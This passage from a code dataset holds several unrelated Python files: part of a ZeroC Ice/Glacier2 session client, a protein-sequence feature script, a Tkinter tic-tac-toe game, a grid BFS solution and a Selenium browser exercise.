True\n cls._interrupted = True\n cls._condVar.release()\n\n try:\n cls._communicator.shutdown()\n except Exception as e:\n Ice.getProcessLogger().error(\n \"{} (while shutting down in response to signal {}): e: {}\\n{}\".format(\n cls._app_name, str(sig), e, traceback.format_exc()))\n\n cls._condVar.acquire()\n cls._callbackInProcess = False\n cls._condVar.notify()\n cls._condVar.release()\n\n _shutdown_on_interrupt_callback = classmethod(_shutdown_on_interrupt_callback)\n\n def 
_callback_on_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n if cls._destroyed:\n #\n # Being destroyed by main thread.\n #\n cls._condVar.release()\n return\n # For SIGHUP the user callback is always called. It can decide what to do.\n\n cls._callbackInProcess = True\n cls._interrupted = True\n cls._condVar.release()\n\n try:\n cls._application.interrupt_callback(sig)\n except Exception as e:\n Ice.getProcessLogger().error(\n \"{} (while interrupting in response to signal {}): e: {}\\n{}\".format(\n cls._app_name, str(sig), e, traceback.format_exc()))\n\n cls._condVar.acquire()\n cls._callbackInProcess = False\n cls._condVar.notify()\n cls._condVar.release()\n\n _callback_on_interrupt_callback = classmethod(_callback_on_interrupt_callback)\n\n HandleSignals = 0\n NoSignalHandling = 1\n\n _nohup = False\n\n _app_name = None\n _application = None\n _ctrlCHandler = None\n _previousCallback = None\n _interrupted = False\n _released = False\n _destroyed = False\n _callbackInProgress = False\n _condVar = threading.Condition()\n _signalPolicy = HandleSignals\n\n _communicator = None\n\n\nclass SessionNotExistException(Exception):\n def __init__(self):\n pass\n\n\nclass RestartSessionException(Exception):\n def __init__(self):\n pass\n\n\nclass SessionCancelException(Exception):\n def __init__(self):\n pass\n\n\nclass ConnectionCallbackI(Ice.ConnectionCallback):\n def __init__(self, app):\n self._app = app\n\n def heartbeat(self, conn):\n pass\n\n def closed(self, conn):\n Ice.getProcessLogger().warning('{} connect closed {}'.format(self._app.name, conn))\n self._app.connection_closed()\n\n\nclass GlacierSession(threading.Thread, abc.ABC):\n \"\"\"数据透传链路\"\"\"\n\n def __init__(self, name: str, config_file: str, init_data_list: list, logger):\n \"\"\"\n :param name:\n 实例and线程的名称\n :param config_file:\n The file path of an Ice configuration file,高优先级\n :param init_data_list:\n InitializationData properties 参数,低优先级\n [('Ice.Default.Host', '127.0.0.1'), ('Ice.Warn.Connections', '1'), ... 
]\n :param logger:\n python 的标准库 logger 对象\n :var self.exception:\n 当线程退出后,可获取线程内部产生的异常\n 在网络连接断开后,内部进行自动重试,因此不会记录到网络通信组件的异常\n \"\"\"\n super(GlacierSession, self).__init__(name=name)\n self.config_file = config_file\n self.init_data_list = init_data_list\n self.logger = logger\n\n self.init_data_list.append((\"Ice.RetryIntervals\", \"-1\")) # 关闭ACM的重试功能\n\n self._communicator = None\n self._adapter = None\n self._router = None\n self._session = None\n self._is_session_created = False\n self._category = None\n\n self.exception = None\n\n self._quit = False\n self._quit_cond = threading.Condition()\n\n def __del__(self):\n if self.session_exist:\n Ice.getProcessLogger().error('{} not uninit !!!!'.format(self.name))\n self._do_uninit_internal()\n Ice.getProcessLogger().trace(None, '{} __del__'.format(self.name))\n\n def start(self):\n \"\"\"连接到透传网关\n\n :remark:\n 当首次连接失败时,抛出异常\n 当运行过程中链路断开后,会进行自动重连\n \"\"\"\n init_data = Application.generate_init_data(self.config_file, self.init_data_list, None)\n self._do_init_internal(init_data)\n Ice.getProcessLogger().trace(None, '{} init ok'.format(self.name))\n\n try:\n super(GlacierSession, self).start()\n except Exception as e:\n Ice.getProcessLogger().error('{} start failed {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._do_uninit_internal()\n raise\n\n def stop(self):\n \"\"\"停止连接\n\n :remark:\n 异步,不等待连接停止\n \"\"\"\n Ice.getProcessLogger().trace(None, '{} set quit flag'.format(self.name))\n self._quit_cond.acquire()\n self._quit = True\n self._quit_cond.notify_all()\n self._quit_cond.release()\n\n def stop_and_join(self):\n \"\"\"停止连接并等待连接停止\n\n :remark:\n 同步\n \"\"\"\n self.stop()\n if self.is_alive():\n self.join()\n\n @abc.abstractmethod\n def get_session_username_and_password(self) -> (str, str):\n \"\"\"获得连接到Glacier服务的username与password\"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def run_with_session(self):\n \"\"\"主业务逻辑\n\n :remark:\n 已经连接到Glacier服务,可以调用所有成员函数\n 不可阻塞在该函数中\n 如果发生链路断开,该方法会被重复调用\n \"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def post_run_with_session(self):\n \"\"\"主业务逻辑清理接口\n\n :remark:\n 当 run_with_session 中发生异常时,将会被调用\n 当 run_with_session 返回后发生异常,将会被调用\n \"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def connection_closed(self):\n \"\"\"保留:通知链路断开\"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def heartbeat_check(self):\n \"\"\"高层逻辑心跳\"\"\"\n raise NotImplementedError()\n\n @property\n def communicator(self):\n return self._communicator\n\n @property\n def session_exist(self) -> bool:\n \"\"\"判断session是否正常\n\n :remark:\n 仅仅检查标记,不进行数据报文探测\n \"\"\"\n return self._is_session_created and self._category is not None\n\n @property\n def router(self):\n assert self._router is not None\n return self._router\n\n @property\n def session(self):\n if not self.session_exist:\n raise SessionNotExistException()\n return self._session\n\n @property\n def category_for_client(self):\n if not self.session_exist:\n raise SessionNotExistException()\n return self._category\n\n def create_callback_identity(self, name):\n return Ice.Identity(name, self.category_for_client)\n\n def add_with_uuid(self, servant):\n return self.object_adapter.add(servant, self.create_callback_identity(Ice.generateUUID()))\n\n @property\n def object_adapter(self):\n if not self.session_exist:\n raise SessionNotExistException()\n if self._adapter is None:\n self._adapter = self._communicator.createObjectAdapterWithRouter(\"\", self._router)\n self._adapter.activate()\n return self._adapter\n\n 
@property\n def _run_continue(self) -> bool:\n \"\"\"线程是否继续循环工作\"\"\"\n if self._quit:\n raise SessionCancelException()\n return self.exception is None\n\n def run(self):\n try:\n while self._run_continue:\n if self.session_exist:\n self._run_with_session()\n else:\n self._create_new_session()\n except SessionCancelException:\n pass # do nothing\n finally:\n Ice.getProcessLogger().warning('{} exit'.format(self.name))\n\n def _set_exception(self, e):\n if isinstance(e, SessionCancelException):\n # 主动取消的优先级最高\n self.exception = e\n elif self.exception is None:\n self.exception = e\n else:\n # 仅记录最初始的异常\n Ice.getProcessLogger().trace(None, '{} ignore record {}'.format(self.name, e))\n\n def _create_new_session(self):\n init_data = Application.generate_init_data(self.config_file, self.init_data_list, None)\n try:\n self._do_init_internal(init_data)\n except RestartSessionException:\n self._do_uninit_internal()\n pass # do nothing\n except (Ice.ConnectionRefusedException, Ice.ConnectionLostException, Ice.UnknownLocalException,\n Ice.RequestFailedException, Ice.TimeoutException) as e:\n Ice.getProcessLogger().error('{} init net {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._do_uninit_internal()\n pass # do nothing\n except Exception as e:\n Ice.getProcessLogger().error('{} failed {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._set_exception(e)\n\n def _need_running(self) -> bool:\n self._quit_cond.acquire()\n self._quit_cond.wait(60) # wait 60s\n self._quit_cond.release()\n return not self._quit\n\n def _run_with_session(self):\n try:\n self.run_with_session()\n while self._need_running():\n self.heartbeat_check()\n raise SessionCancelException()\n\n # We want to restart on those exceptions which indicate a\n # break down in communications, but not those exceptions that\n # indicate a programming logic error (ie: marshal, protocol\n # failure, etc).\n except SessionCancelException as sce:\n Ice.getProcessLogger().warning('{} SessionCancelException'.format(self.name))\n self._set_exception(sce)\n except RestartSessionException:\n pass # do nothing\n except (Ice.ConnectionRefusedException, Ice.ConnectionLostException, Ice.UnknownLocalException,\n Ice.RequestFailedException, Ice.TimeoutException) as e:\n Ice.getProcessLogger().error('{} run net {}\\n{}'.format(self.name, e, traceback.format_exc()))\n pass # do nothing\n except Exception as e:\n Ice.getProcessLogger().error('{} failed {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._set_exception(e)\n finally:\n self._post_run_with_session()\n self._do_uninit_internal()\n\n def _post_run_with_session(self):\n try:\n self.post_run_with_session()\n except Exception as e:\n Ice.getProcessLogger().warning(\n '{} _post_run_with_session {}\\n{}'.format(self.name, e, traceback.format_exc()))\n\n def _do_init_internal(self, init_data):\n try:\n self._communicator = Ice.initialize(data=init_data)\n\n self._router = Glacier2.RouterPrx.uncheckedCast(\n self._communicator.getDefaultRouter())\n if self._router is None:\n raise Exception('no glacier2 router configured')\n\n try:\n username, password = self.get_session_username_and_password()\n self._session = self._router.createSession(username, password)\n self._is_session_created = True\n except Ice.LocalException as e:\n Ice.getProcessLogger().error('call create_session failed {}\\n{}'.format(e, traceback.format_exc()))\n raise\n\n if self._is_session_created:\n self._set_acm_setting()\n self._category = self._router.getCategoryForClient()\n except Exception as e:\n 
Ice.getProcessLogger().error('_do_init_internal failed : {}'.format(e))\n self._do_uninit_internal()\n raise\n\n def _set_acm_setting(self):\n acm_timeout = 0\n try:\n acm_timeout = self._router.getACMTimeout()\n except Ice.OperationNotExistException:\n pass\n if acm_timeout <= 0:\n acm_timeout = self._router.getSessionTimeout()\n if acm_timeout > 0:\n connection = self._router.ice_getCachedConnection()\n assert connection, '_do_init_internal ice_getCachedConnection failed'\n connection.setACM(acm_timeout, Ice.Unset, Ice.ACMHeartbeat.HeartbeatAlways)\n connection.setCallback(ConnectionCallbackI(self))\n\n def _do_uninit_internal(self):\n if self._router:\n if self._is_session_created:\n self._is_session_created = False\n try:\n self._router.destroySession()\n except (Ice.ConnectionLostException, SessionNotExistException):\n pass\n except Exception as e:\n Ice.getProcessLogger().error(\n 'unexpected exception when destroying the session {}\\n{}'.format(e, traceback.format_exc()))\n\n self._router = None\n\n if self._communicator:\n try:\n self._communicator.destroy()\n except Exception as e:\n Ice.getProcessLogger().error(\n 'unexpected exception when destroying the communicator {}\\n{}'.format(e, traceback.format_exc()))\n\n self._communicator = None\n\n self._adapter = None\n self._router = None\n self._session = None\n self._createdSession = False\n self._category = None\n","repo_name":"ShawnYi5/agent_application","sub_path":"common_utils/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":27005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30007460388","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer,TfidfVectorizer\n\nfrom sklearn.pipeline import FeatureUnion,Pipeline,make_union,make_pipeline\n\nfrom common import timer,read_csv,ItemSelector,TextStats\n\nwith timer(\"Load data\"):\n\tdf_protein_train = read_csv(\"df_protein_train.csv\")\n\tdf_protein_test = read_csv(\"df_protein_test.csv\")\n\ndf_protein = pd.concat([df_protein_train,df_protein_test])\ndf_protein.Sequence = df_protein.Sequence.apply(lambda x: x.upper())\n\nfeature_union = make_union(\n\tmake_pipeline(ItemSelector(key=\"Sequence\"),CountVectorizer(analyzer='char',ngram_range=(1,1))),\n\tmake_pipeline(ItemSelector(key=\"Sequence\"),TfidfVectorizer(analyzer='char',ngram_range=(1,1),use_idf=False)),\n\tmake_pipeline(ItemSelector(key=\"Sequence\"),TextStats(), DictVectorizer())\n\t)\n\nwith timer(\"Fit feature_union\"):\n\tfeat = feature_union.fit_transform(df_protein)\n\nout_col = [f'protein_stat_{i}' for i in range(feat.shape[1])]\noutput_file = \"./input/temp/df_protein_stat.csv\"\n\nwith timer(f\"Save file to {output_file}\"):\n\tdf_out = pd.DataFrame(feat.todense(),columns=out_col)\n\tdf_out['Protein_ID'] = df_protein.Protein_ID.values\n\tdf_out[['Protein_ID']+out_col].to_csv(output_file,index=False)","repo_name":"panjianning/DataCastle-Drug-Competition-1th-Place","sub_path":"make_protein_stat.py","file_name":"make_protein_stat.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"13404403921","text":"\"\"\"\r\n\r\nMorpion by Maxence.R\r\n\r\nDéveloppers and Designer\r\nInformaticiens indépendants\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n#\r\n#Importation des modules\r\n#\r\n\r\nimport time\r\nfrom tkinter import *\r\nfrom 
tkinter.messagebox import *\r\nimport pygame\r\nfrom random import *\r\n\r\ndef Clic(event):\r\n global a,C1,C2,C3,C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R,L1,L2,L3\r\n \r\n #\r\n # position du pointeur de la souris\r\n #\r\n \r\n X = event.x\r\n Y = event.y\r\n\r\n # \r\n #Si a=1 on met une croix\r\n #\r\n\r\n if a==1:\r\n if X < 100:\r\n if Y < 100:\r\n if C1[0]==2:\r\n a=0\r\n C1[0]=1\r\n L1[0]=1\r\n Croix(50,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if Y < 200:\r\n if C1[1]==2:\r\n a=0\r\n C1[1]=1\r\n L2[0]=1\r\n Croix(50,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if C1[2]==2:\r\n a=0\r\n C1[2]=1\r\n L3[0]=1\r\n Croix(50,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 200 and X > 100:\r\n if Y < 100:\r\n if C2[0]==3:\r\n a=0\r\n C2[0]=1\r\n L1[1]=1\r\n Croix(150,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if Y < 200:\r\n if C2[1]==3:\r\n a=0\r\n C2[1]=1\r\n L2[1]=1\r\n Croix(150,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if C2[2]==3:\r\n a=0\r\n C2[2]=1\r\n L3[1]=1\r\n Croix(150,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 300 and X > 200:\r\n if Y < 100:\r\n if C3[0]==4:\r\n a=0\r\n C3[0]=1\r\n L1[2]=1\r\n Croix(250,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if Y < 200:\r\n if C3[1]==4:\r\n a=0\r\n C3[1]=1\r\n L2[2]=1\r\n Croix(250,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C3[2]==4:\r\n a=0\r\n C3[2]=1\r\n L3[2]=1\r\n Croix(250,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n # \r\n #Ici a=0 et on met un rond\r\n #\r\n\r\n else:\r\n if X < 100:\r\n if Y < 100:\r\n if C1[0]==2:\r\n a=1\r\n C1[0]=0\r\n L1[0]=0\r\n Rond(50,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if Y < 200:\r\n if C1[1]==2:\r\n a=1\r\n C1[1]=0\r\n L2[0]=0\r\n Rond(50,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C1[2]==2:\r\n a=1\r\n C1[2]=0\r\n L3[0]=0\r\n Rond(50,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 200 and X > 100:\r\n if Y < 100:\r\n if C2[0]==3:\r\n a=1\r\n C2[0]=0\r\n L1[1]=0\r\n Rond(150,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if Y < 200:\r\n if C2[1]==3:\r\n a=1\r\n C2[1]=0\r\n L2[1]=0\r\n Rond(150,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C2[2]==3:\r\n a=1\r\n C2[2]=0\r\n L3[1]=0\r\n Rond(150,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 300 and X > 200:\r\n if Y < 100:\r\n if C3[0]==4:\r\n a=1\r\n C3[0]=0\r\n L1[2]=0\r\n Rond(250,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if Y < 200:\r\n if C3[1]==4:\r\n a=1\r\n C3[1]=0\r\n L2[2]=0\r\n Rond(250,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C3[2]==4:\r\n a=1\r\n C3[2]=0\r\n L3[2]=0\r\n Rond(250,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n\r\n#\r\n#ici on créer la fonction pour afficher les ronds\r\n#\r\n\r\ndef Rond(x1,y1):\r\n global C1,C2,C3\r\n morpion.create_oval(x1-45,y1-45,x1+45,y1+45, fill=\"#FFFFFF\")\r\n Verif()\r\n\r\n#\r\n#ici on créer la fonction pour afficher les croix\r\n#\r\n\r\ndef 
Croix(x1,y1):\r\n global C1,C2,C3\r\n morpion.create_line(x1-45,y1-45,x1+45,y1+45, fill=\"#FFFFFF\")\r\n morpion.create_line(x1+45,y1-45,x1-45,y1+45, fill=\"#FFFFFF\")\r\n Verif()\r\n\r\ndef player_info():\r\n pseudo=pseudonyme.get()\r\n pseudo2=pseudonyme_two.get()\r\n \r\n print(\"Joueur 1 : \" + pseudo)\r\n print(\"Joueur 2 : \" + pseudo2)\r\n\r\nscore = 0\r\n\r\ndef replay_game_if_win():\r\n global score\r\n replay_game()\r\n score = 0\r\n #\r\n # Ici on remet les score a 0\r\n #\r\n\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n\r\n ascore2 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore2.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore2.place(x=250, y=30)\r\n\r\ndef add_point_score():\r\n global score\r\n global pseudonyme\r\n score +=25\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n if score >= 120:\r\n pseudo2=pseudonyme.get()\r\n showinfo(title='Gagne',message=f'{pseudo2} a Gagner !')\r\n time.sleep(2)\r\n replay_game_if_win()\r\n else:\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n\r\nscore2 = 0\r\n\r\ndef add_point_score2():\r\n global score2\r\n global pseudonyme_two\r\n score2 +=25\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n if score2 >= 121:\r\n pseudo=pseudonyme_two.get()\r\n showinfo(title='Gagne',message=f'{pseudo} a Gagner !')\r\n time.sleep(2)\r\n replay_game_if_win()\r\n else:\r\n ascore2 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore2.create_rectangle(0, 0, score2, 45, fill='#595558', width=0)\r\n ascore2.place(x=250, y=30)\r\n\r\ndef replay_game():\r\n global morpion\r\n global C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R\r\n global C1, C2,C3,C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R,L1,L2,L3\r\n global C1, L1, C2, L2, C3, L3\r\n global a\r\n morpion.delete('all')\r\n\r\n #\r\n #ici on recréer les lignes qui délimite les colones et les cases\r\n #\r\n\r\n\r\n morpion.create_line(0,100,300,100,fill=\"white\",width=4)\r\n\r\n morpion.create_line(0,200,300,200,fill=\"white\",width=4)\r\n\r\n morpion.create_line(100,300,300,-100000,fill=\"white\",width=4)\r\n\r\n morpion.create_line(200,300,300,-100000,fill=\"white\",width=4)\r\n \r\n C1=[2,2,2]\r\n L1=[2,2,2]\r\n\r\n C2=[3,3,3]\r\n L2=[3,3,3]\r\n\r\n C3=[4,4,4]\r\n L3=[4,4,4]\r\n\r\n a=1\r\n\r\ndef Verif():\r\n global C1, C2,C3,C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R,L1,L2,L3\r\n C1RC = C1.count(1)\r\n C1R = C1.count(0)\r\n C2RC = C2.count(1)\r\n C2R = C2.count(0)\r\n C3RC = C3.count(1)\r\n C3R = C3.count(0)\r\n \r\n L1RC = L1.count(1)\r\n L1R = L1.count(0)\r\n L2RC = L2.count(1)\r\n L2R = L2.count(0)\r\n L3RC = L3.count(1)\r\n L3R = L3.count(0)\r\n\r\n #\r\n #ici on affiche le joueur qui a gagner\r\n #\r\n\r\n if C1RC == 3 or C2RC == 3 or C3RC == 3 or (C1[0]==1 and C2[1]==1 and C3[2]==1) or (C1[2]==1 and C2[1]==1 and C3[0]==1) or L1RC == 3 or L2RC == 3 or L3RC == 3:\r\n \"\"\"\r\n Joueur 1\r\n \"\"\"\r\n add_point_score()\r\n 
replay_game()\r\n if C1R == 3 or C2R == 3 or C3R == 3 or (C1[0]==0 and C2[1]==0 and C3[2]==0) or (C1[2]==0 and C2[1]==0 and C3[0]==0) or L1R == 3 or L2R == 3 or L3R == 3:\r\n \"\"\"\r\n Joueur 2\r\n \"\"\"\r\n add_point_score2()\r\n replay_game()\r\n \r\n#\r\n#ici on initialise les colones et les lignes\r\n#\r\n\r\nC1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R = 0,0,0,0,0,0,0,0,0,0,0,0\r\n \r\n\r\n \r\na=1\r\n\r\nC1=[2,2,2]\r\nL1=[2,2,2]\r\n\r\nC2=[3,3,3]\r\nL2=[3,3,3]\r\n\r\nC3=[4,4,4]\r\nL3=[4,4,4]\r\n\r\n\r\n\r\n#\r\n# Création de la fenêtre principale\r\n#\r\n\r\nroot = Tk()\r\nroot.title(\"Morpion\")\r\nroot.minsize(600, 500)\r\nroot.resizable(False, False)\r\nroot.config(background='#C4C4C4')\r\nroot.title(\"Sn'Game | Morpion\")\r\nroot.iconbitmap(\"core/64px.ico\")\r\n\r\n\r\n\r\n#\r\n# Création d'un widget Canvas\r\n#\r\n\r\ntitle1 = Frame(root)\r\n\r\nhcan = Canvas(root, width = 500, height =500, bg =\"#2B2B2B\", highlightthickness=0)\r\nhcan.place(x=0,y=0)\r\n\r\nLargeur = 300\r\nHauteur = 300\r\nmorpion = Canvas(root, width = Largeur, height =Hauteur, bg =\"#2B2B2B\", highlightthickness=0)\r\n\r\n#\r\n# La méthode bind() permet de lier un événement avec une fonction :\r\n#\r\n# un clic gauche sur la zone graphique provoquera l'appel de la fonction utilisateur Clic()\r\n#\r\n\r\n\r\nmorpion.bind(\"\", Clic)\r\nmorpion.place(x=100,y=100)\r\n\r\n\r\n#\r\n#ici on créer les lignes qui délimite les colones et les cases\r\n#\r\n\r\n\r\nmorpion.create_line(0,100,300,100,fill=\"white\",width=4)\r\n\r\nmorpion.create_line(0,200,300,200,fill=\"white\",width=4)\r\n\r\nmorpion.create_line(100,300,300,-100000,fill=\"white\",width=4)\r\n\r\nmorpion.create_line(200,300,300,-100000,fill=\"white\",width=4)\r\n\r\n#\r\n# Création du texte\r\n#\r\n\r\ntext = Label(root, text=\" Morpion \", font=('Arial', 48),bg='#2B2B2B', fg='white')\r\ntext.place(x=450,y=0)\r\n\r\nhandmade = Label(root, text=\"Handmade by Kijusu\", font=('Roboto', 20),bg='#C4C4C4', fg='#121212')\r\nhandmade.place(x=520,y=445)\r\n\r\n#\r\n# Création des boutons et des Entrée de texte\r\n#\r\n\r\nvalider_button =Button(root, text=\"Valider\", bg='#5E5E5E',font=('Arial', 15), fg='#C4C4C4',activebackground = \"#5E5E5E\", activeforeground = \"#C4C4C4\", command=lambda: [f() for f in [player_info, change_name]])\r\nvalider_button.place(x=598, y=360, width=100, height=27)\r\n\r\npseudo_txt = Label(root, text=\"Pseudo joueur 1 :\", font=('Arial', 18),bg='#C4C4C4', fg='#2B2B2B')\r\npseudo_txt.place(x=558, y=165)\r\n\r\npseudonyme = Entry(root, text=\"Pseudo\", bg='#EDEDED', fg='#2B2B2B', bd=0 ,width=29,highlightthickness=0, justify='center', font=('Arial', 9))\r\npseudonyme.place(x=550, y=200, height=25)\r\n\r\npseudo_txt_two = Label(root, text=\"Pseudo joueur 2 :\", font=('Arial', 18),bg='#C4C4C4', fg='#2B2B2B')\r\npseudo_txt_two.place(x=558, y=265)\r\n\r\npseudonyme_two = Entry(root, text=\"Pseudotwo\", bg='#EDEDED', fg='#2B2B2B', bd=0 ,width=29,highlightthickness=0, justify='center', font=('Arial', 9))\r\npseudonyme_two.place(x=550, y=300, height=25)\r\n\r\ndef ascore():\r\n\r\n line = Canvas(root, width=50, height=60, bg='#2A2A2A', highlightthickness=0)\r\n line.create_line(20,30,30,-100000,fill=\"white\",width=3)\r\n line.place(x=228, y=30)\r\n\r\n score_canvas1 = Canvas(root, width=120, height=60, bg='#2A2A2A', highlightthickness=0)\r\n score_canvas1.create_rectangle(0, 15, 120, 45, fill='#443F42', width=0)\r\n score_canvas1.place(x=128, y=15)\r\n\r\n score_canvas2 = Canvas(root, width=120, height=60, bg='#2A2A2A', 
highlightthickness=0)\r\n score_canvas2.create_rectangle(0, 15, 120, 45, fill='#443F42', width=0)\r\n score_canvas2.place(x=250, y=15)\r\nascore()\r\n\r\njoueur1 = Label(root, text=\"Joueur 1\", bg=\"#2A2A2A\", fg=\"white\", font=(\"Arial\",10))\r\njoueur1.place(x=128, y=5)\r\n\r\njoueur2 = Label(root, text=\"Joueur 2\", bg=\"#2A2A2A\", fg=\"white\", font=(\"Arial\",10))\r\njoueur2.place(x=316, y=5)\r\n\r\ndef change_name():\r\n global pseudonyme\r\n psde1= pseudonyme.get()\r\n psde2 = pseudonyme_two.get()\r\n # prevoir la variable pour recevoir le texte saisi\r\n joueur1['text'] = psde1\r\n joueur2['text'] = psde2\r\n joueur1.place(x=128, y=5)\r\n joueur2.place(x=357-7*(len(psde2)-1), y=5)\r\n\r\n \"\"\"\r\n x= 360\r\n y= 5\r\n \"\"\"\r\n\r\n#\r\n# Centrer la fenêtre en fonction de l'écran de l'ordinateur\r\n#\r\n\r\nw =800\r\nh =500\r\n\r\nws = root.winfo_screenwidth()\r\nhs = root.winfo_screenheight()\r\n# calculate position x, y\r\nx = (ws/2) - (w/2) \r\ny = (hs/2) - (h/2)\r\nroot.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n\r\n#\r\n# Afficher la fennetre\r\n#\r\n\r\nmainloop()\r\n","repo_name":"MaxenceR26/morpion-tkinter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14574,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39226464368","text":"from collections import deque\r\n\r\n# define the four possible movements (up, down, left, right)\r\ndx = [-1, 1, 0, 0]\r\ndy = [0, 0, -1, 1]\r\n\r\n# read the input\r\nn, m = map(int, input().split())\r\ngrid = []\r\nfor i in range(n):\r\n row = list(map(int, input().split()))\r\n grid.append(row)\r\n\r\n# find the location of the target\r\nfor i in range(n):\r\n for j in range(m):\r\n if grid[i][j] == 2:\r\n target_x, target_y = i, j\r\n\r\n# initialize the distance matrix\r\ndist = [[-1]*m for i in range(n)]\r\n\r\n# breadth-first search starting from the target\r\nqueue = deque([(target_x, target_y)])\r\ndist[target_x][target_y] = 0\r\n\r\nwhile queue:\r\n curr_x, curr_y = queue.popleft()\r\n for i in range(4):\r\n next_x, next_y = curr_x + dx[i], curr_y + dy[i]\r\n if next_x < 0 or next_x >= n or next_y < 0 or next_y >= m:\r\n continue\r\n if grid[next_x][next_y] == 0:\r\n continue\r\n if dist[next_x][next_y] != -1:\r\n continue\r\n dist[next_x][next_y] = dist[curr_x][curr_y] + 1\r\n queue.append((next_x, next_y))\r\n\r\n# print the result\r\nfor i in range(n):\r\n for j in range(m):\r\n if grid[i][j] == 0:\r\n print(\"0\", end=\" \")\r\n elif dist[i][j] == -1:\r\n print(\"-1\", end=\" \")\r\n else:\r\n print(dist[i][j], end=\" \")\r\n print()\r\n","repo_name":"unboxing96/ALGO","sub_path":"백준/Silver/14940. 
쉬운 최단거리/쉬운 최단거리.py","file_name":"쉬운 최단거리.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1352168208","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport math\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry: \n link = \"http://suninjuly.github.io/alert_accept.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n\n # Нажимаем на кнопку\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\n # Принимаем confirm\n confirm = browser.switch_to.alert\n confirm.accept()\n\n # ждем загрузки страницы\n time.sleep(1)\n\n # Считываем число Х\n x1 = browser.find_element(By.ID, 'input_value')\n x = x1.text\n # Считаем формулу\n y = calc(x)\n\n # Записываем в поле ответ формулы\n input1 = browser.find_element(By.ID, \"answer\")\n input1.send_keys(y)\n\n # Отправляем данные\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(30)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце 